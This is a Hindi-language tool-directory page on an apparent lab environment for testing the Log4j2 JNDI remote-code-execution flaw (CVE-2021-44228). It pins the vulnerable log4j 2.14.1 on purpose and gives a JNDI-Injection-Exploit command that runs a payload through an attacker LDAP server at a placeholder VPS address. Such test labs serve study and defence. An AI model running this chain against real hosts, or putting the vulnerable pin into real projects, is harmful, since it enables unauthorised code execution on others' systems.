Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/1in9e/apache-log4j2-rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHub1in9e/apache-log4j2-rce

Apache-Log4j2-RCE

Apache Log4j2 RCE( CVE-2021-44228)सत्यापन वातावरण

रिपॉजिटरी देखें
2114 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Apache Log4j2 RCE सत्यापन वातावरण

2021.12.09 से

कुछ संदर्भ

https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg

वातावरण सेटअप

Maven में संबंधित पैकेज और कमजोर संस्करण श्रेणी शामिल करें

root@kitploit:~
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

0

जाँच

DNSlog का उपयोग करके जांचें कि यह उपयोग में है या नहीं

0

LDAP के साथ JNDI का उपयोग करके RCE का लाभ उठाना

JDK संस्करण पर निर्भर करता है। JDK 11.0.1, 8u191, 7u201, 6u211 के बाद trustURLCodebase को true पर मैन्युअल रूप से सेट करना आवश्यक है।

इसके बारे में विस्तृत जानकारी के लिए देखें https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/

उपयोग विधि: JNDI इंजेक्शन टूल के साथ संयोजन कर सकते हैं, उदाहरण के लिए JNDI-Injection-Exploit, fastjson_rce_tool, JNDIExploit

उपकरणों के साथ संयोजन करके कई सार्वजनिक रूप से ज्ञात रीवाइंड विधियाँ और मेमोरी-माउंट इंजेक्शन विधियाँ भी प्राप्त की जा सकती हैं।

root@kitploit:~
# 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app"  -A your_vps_ip

1

वेब

TODO

3

के बारे में

https://github.com/apache/logging-log4j2/tags

टूल डाउनलोड करें